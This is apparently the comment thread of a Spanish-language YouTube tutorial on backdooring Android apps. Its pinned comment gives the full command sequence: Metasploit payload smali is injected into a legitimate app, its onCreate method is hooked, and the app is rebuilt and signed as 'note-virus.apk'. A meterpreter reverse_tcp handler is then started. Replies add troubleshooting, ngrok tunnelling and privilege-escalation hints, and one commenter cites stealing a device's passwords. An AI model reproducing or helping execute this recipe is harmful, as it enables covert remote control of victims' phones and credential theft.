Por aca le dejo escrito los comandos: ---------------------------------------------------------- - descargamos el apktool desde github: github.com/iBotPeaches/Apktool/releases/tag/v2.9.2 - para ejecutar es: java -jar la ruta del apktool.jar - ingresamos al smali de la apk maliciosa y lo descomprimimos dentro de la carpeta de la app que vamos a infectar usando tar tar -cf - ./smali | (cd ../notas; tar -xpf - ) - buscamos dentro de android manifest la ruta de MAIN grep -B2 "MAIN" AndroidManifest.xml - buscamos el archivo onCreate y le redirigimos a nuestro pyload dentro de metasploit le copiamos lo siguiente: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - ahora pasamos a revisar los permisos de la aplicacion infectada cat AndroidManifest.xml | grep "uses-permission - luego creamos el apk nuevamente java -jar ../../apktool_2.9.2.jar b notas -o note-virus.apk - si presenta error corremos lo siguiente java -jar ../../apktool_2.9.2.jar apktool empty-framework-dir --force - firmamos la apk keytool -genkey -v -keystore notes.keystore -alias notes -keyalg RSA -keysize 2048 -validity 10000 - luego usamos jarsigner si no esta instalados corremos el siguiente comando para instalar: apt-get install openjdk-11-jdk-headless luego ejecutamos los siguiente para ejecutar el firmado: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore notes.keystore note-virus.apk notes - levantamos metasploit msfdb run use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4646 exploit
@maximartiarena986610 ай бұрын
Me pasarias la apk que usaste? descarge muchas, pero no me dan confianza para realizar esta prueba.
@midesmis10 ай бұрын
@@maximartiarena9866 tendría que buscarla xq la eliminé pero puedes descargar cualquiera apk de la página que eso en el video para la descarga
@mariopalaciosrendon99599 ай бұрын
❤
@hectorrodriguez2736Ай бұрын
necesitamos mas creadores de contenido asi, que enseñan la realidad para concientizar a los usuarios.
@alvarobalada6528 Жыл бұрын
Este video demuestra que hay que pensar dos veces antes de descargarse una APK modificada! Muy buen video amigo!
@midesmis Жыл бұрын
Así es amigo, la gente descarga y instala app sin analizar las consecuencias
@maximartiarena986610 ай бұрын
Amigo. te pasaste. me diste ideas para proteger mi celular y a mi gente. Usen siempre las herramientas con hética muchachos.
@saulgarciaarroyo40359 ай бұрын
¡¡Excelente video amigo!! Buena explicación
@midesmis9 ай бұрын
Gracias bro y bienvenido a la comunidad
@exequielo9 ай бұрын
Usando todo esté conocimiento podríamos revisar apks y ver en su código si existen archivos maliciosos y así prevenirno y parchar la amenaza....
@midesmis9 ай бұрын
Claro sería lo ideal, estaría bueno revisar.
@diaverso57946 ай бұрын
Cuando intento instalar la aplicacion modificada, me sale el mensaje de "La aplicacion no se ah instalado, porque parece que el paquete no es valido" Pero la original si que se instala
@esbiblico12 күн бұрын
Esto se puede hacer desde un vps o maquina virtual para no exponernos tanto?. Solo debo descargar aplicaciones desde la PlayStore?
@Python_12_Official2 ай бұрын
Deberías crear un curso completo de hacking android desde cero
@midesmis2 ай бұрын
Eso va poco a poco, ahora estoy creando un proyecto llamado Hacker game pronto lo subiré al canal
@pwd_hack5 ай бұрын
Buen video, sigue asi. Sensei.
@midesmis5 ай бұрын
Gracias bro por ahí voy a tratar de hacer algún otro video sobre hacking en Android
@World_Football_Siu76 ай бұрын
Muy bien vídeo, podrías hacer uno en dónde modifiques la APK pero en este caso para que un bot envíe información telegram.
@officialkiller-bk8sj7 ай бұрын
Calcado el video de savitar jajajaa Buen video
@midesmis7 ай бұрын
Gran maestro el savitar se aprende bastante de él
@claudiolujan4688 ай бұрын
Gracias capo segui asi
@jdct10 ай бұрын
Buen video Bro, tengo una pregunta, cada vez que quiera acceder al dispositivo android desde metasploit, tengo que poner los datos del lport y todo eso de nuevo, y me saldrá el dispositivo que está infectado? O solo funciona una sola vez?
@midesmis10 ай бұрын
Así es bro siempre que quieres ingresar debes apuntar el metasploit al dispositivo.
@taniacotrofepeteira59696 ай бұрын
Esto es perfecto para infectar un despositivo y sacar sus claves
@retr0.1Axxo8 ай бұрын
tengo un problema me sale este error al crear el meta [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload Error: One or more options failed to validate: LHOST.
@midesmis8 ай бұрын
Son varias cosas, válida que estas colocando correctamente el módulo que necesitas y el puerto, que versión de Kali Linux estás usando ?
@PsYxD Жыл бұрын
dudas...en ngrok tiene que ser el puerto 4646? porque no me conecta ese puerto,lo tengo que abrir yo ewn el router?, si me aclaras eso mejor. Con otros puertos si va pero el 4646 no establece conexion
@midesmis Жыл бұрын
Puedes colocar cualquier puerto la verdad, solo mantén la sesión de Ngrok abierta durante todo el proceso.
@PsYxD Жыл бұрын
@@midesmis ah perfecto, es que justo ese puerto me daba error, con otros si me va , gracias
@m01jaron843 ай бұрын
Bro tengo una pregunta, estoy intentando activar el puerto tcp con ngrok pero me dice que es de paga la función de iniciar túneles tcp. Que hago o que otra opción tengo? Deberías de actualizar este video porfavor respóndeme 🙏
@midesmis3 ай бұрын
Que tal bro casualmente estoy en eso, estoy preparando la actualización de este contenido con nuevas herramientas y formas de hacer las pruebas
@m01jaron843 ай бұрын
@@midesmis excelente hermano, estaré en espera de ese videaso
@Cronicas-biblica8 ай бұрын
Hola amogo quiero modificar una apk que quiero utilizar pero le pase por virus total y me sale que esta infectada y permisos fuera de lo que se necesita como lo hago
@midesmis8 ай бұрын
Lo que sucede es que la seguridad de las aplicaciones ha mejorado mucho hoy en día, estas técnicas toca refinarlas para que sean más efectivas, te toca sentarte a investigar y aprender cómo refinar el proceso
@midesmis8 ай бұрын
Este mundo de la ciberseguridad es un cambio constante lo de ayer no quiere decir que funcione hoy
@nero98x2 ай бұрын
holaaa, emm xd tengo un problema, es que cuando voy a instalar la app, me dice "la aplicación no fue instalada porque el paquete no parece ser valido", q hago ahí? xd...
@midesmis2 ай бұрын
Bueno pueden ser muchos factores una respuesta exacta no la tengo te diría que lo hagas con calma y paso a paso, pronto voy a sacar una versión actualizada de este tutorial pero mientras sigue practicando
@nero98x2 ай бұрын
@midesmis muchas gracias :D, otra pregunta, esto solo funciona con versiones de Android anteriores al 10?, o también se puede aplicar sobre Android 11 y 12?
@midesmis2 ай бұрын
Android se ha actualizado mucho, en este caso puedes usar cualquier apk sin embargo las nuevas versiones detectan casi instantáneamente las apk maliciosas toca jugársela mucho para que se haga la instalación y se acceda a los permisos necesarios de la apk
@nero98x2 ай бұрын
@@midesmis intentaré desde mi dispositivo android, creo que tiene android 12, aunque actualmente se maneja mejor con python y cali linux...
@midesmis2 ай бұрын
Dale bro entre más práctica mejor
@Prepers2511 ай бұрын
Tengo un problema en el minuto 15 cuando tu vas a modificar el archivo android manifestó. Xml a mi no me aparece eso q tu ibas a modificar no me sale y no se q aser
@midesmis10 ай бұрын
Bueno eso que me comentas es interesante te sabes que voy a hacer una comunidad en discord y nos ayudamos a resolver estos problemas, te sumas?
@kang65965 ай бұрын
Ya lo solucionaste? me pasa lo mismo
@kang65965 ай бұрын
@@midesmis bro tengo el mismo error, una solucion? ya he probado con varias apks y lo mismo
@midesmis4 ай бұрын
@@kang6596 unanse al canal de telegram youtube ya me a bajado varios vídeos por allá subiré videos de Ciberseguridad
@alcasec01H18 ай бұрын
Bro como ago persistencia de la aplicación para que no falle la conexión nuevamente o que la aplicación tenga que estar abierta para acceder otra vez
@midesmis8 ай бұрын
La aplicación al final del día es una ventana, tendrías que escalar privilegios para tomar control total del dispositivo.
@GeynerPena22 күн бұрын
Bro es para Android y Apple
@fabriciozetaquiroga79124 ай бұрын
bro y para meter virus a una aplicacion exe?
@midesmis3 ай бұрын
Portate bien jajaja 😂
@manuelantoniorodriguezmosc45642 ай бұрын
Puedo preguntarte eres de Perú
@midesmis2 ай бұрын
Que tal bro jajaa no bro soy de Panamá
@renatoescobar63323 ай бұрын
Es necesario usar el ngrok?
@midesmis2 ай бұрын
Depende si puedes crear un túnel que permita la conexión con alguna otra herramienta también es válido lo importante es poder crear la comunicación
@renatoescobar63322 ай бұрын
@@midesmis excelente, gracias, podrias compartirnos el apk que tu usas en el video por favor? Gracias.
@midesmis2 ай бұрын
@@renatoescobar6332 bueno esa apk la tomé por tomar no se si aún exista, puedes tomar cualquier apk y hacerle la ingeniería inversa, si sigues los pasos te va a funcionar
@elisabethrosaHernandezmosquera3 ай бұрын
En celular como se hace
@midesmis3 ай бұрын
Jajaja portate bien Elisabeth 😅
@AlmaDeportiva9 ай бұрын
Bro donde consigo una mentoria contigo ?
@midesmis9 ай бұрын
Aquí mismo bro deja la pregunta y se te puedo ayudar te ayudo, yo la verdad aún no me considero experto así que no pasa nada ya más adelante si vamos mejorando bueno hacemos mentiría privada pero por ahora deja tu pregunta bro con confianza
@taniacotrofepeteira59695 ай бұрын
@@midesmis donde aprendiste a hackear?
@midesmis5 ай бұрын
@@taniacotrofepeteira5969 empecé por aquí por youtube y después leyendo y investigando todo lo que puedo, aún sigo aprendiendo la verdad
@JoseFernandez-lw8wk5 ай бұрын
El apk que usaste no encontré
@midesmis5 ай бұрын
Puedes usar cualquier otra bro
@JoseFernandez-lw8wk5 ай бұрын
Mensajes liminales jajjaja al abrir la terminal
@claudiolujan4688 ай бұрын
Tengo un problema crack me aparece esto que puede ser? java -jar apktool_2.9.2.jar b com.notas.controlador_2021-06-21.apk~/s/downloads fish: Job 1, 'java -jar apktool_2.9.2.jar b c…' terminated by signal SIGSYS (Bad system call)
@midesmis8 ай бұрын
Este problema puede ser por que la apk tiene un error de compatibilidad con el jar, te toca hacer la tarea de investigar ya que esto así a simple vista no es fácil de responder